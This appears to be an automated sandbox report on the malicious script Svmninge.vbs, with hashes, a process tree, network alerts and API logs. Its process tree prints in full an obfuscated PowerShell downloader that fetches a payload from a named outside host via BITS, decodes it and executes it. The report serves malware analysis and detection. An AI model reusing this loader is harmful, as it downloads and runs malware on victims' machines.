Summary | ZeroBOX

Svmninge.vbs

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6401 July 19, 2023, 9:02 a.m. July 19, 2023, 9:04 a.m.
Size 55.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 862907006745ef6b2bdc5dd2664f06ec
SHA256 f6f8fcfb80125691e245e06081bd5bec961b042a688a59d9e853929af9df2672
CRC32 E9388B61
ssdeep 768:itWSuK7NEgwhUwavzIPsjXuBmFcp5o+1w/LSs4ynIgj4KiG:itMK7mDF4zxXu0m5o+1wDz4EI+4e
Yara
  • Generic_Malware_Zero - Generic Malware

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Svmninge.vbs

    2572
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"

      2752

Name Response Post-Analysis Lookup
www.taramulalbinelor.ro 31.14.23.109
IP Address Status Action
164.124.101.2 Active Moloch
31.14.23.109 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49168 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49168 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49168 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49166 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49179 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49173 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49179 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49173 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49163 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49173 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49163 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49168 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49163 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49168 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49179 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49179 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49173 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49173 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49163 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49163 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49170 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49170 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49176 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49176 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49170 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49185 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49170 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49185 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49176 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49185 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49178 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49166 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49174 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49166 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49174 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49174 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49174 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49177 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49177 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49186 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49188 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49188 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49188 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49188 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49185 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49185 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49176 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49195 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49195 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49191 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49191 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49181 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49181 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49192 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49192 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49189 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49192 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49189 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49192 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49189 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49189 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49189 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49193 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49193 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49164 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49164 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49164 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49164 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49167 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49167 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49169 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49169 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49169 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49169 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49171 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49171 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49187 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49187 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49187 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49187 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49190 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49194 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49194 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49194 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49194 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49194 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49199 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49199 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49199 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49199 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49196 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49196 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49182 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49182 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49200 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49184 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49200 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49184 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49180 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49180 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49183 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49183 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49197 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49197 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49178 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49178 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49198 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49198 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49186 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49186 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49190 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49190 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x0000004f
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x00000067
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x000000a3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x000000b7
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x00000073
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000000c3
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x00000117
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x0000012f
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x0000016b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x000001ff
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x00000227
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x0000023b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x00000263
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x000002b7
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x000002cf
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x000002e3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x000002f7
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x0000030b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x0000031f
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x0000005b
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x00000073
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x000000c7
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x0000014b
1 1 0

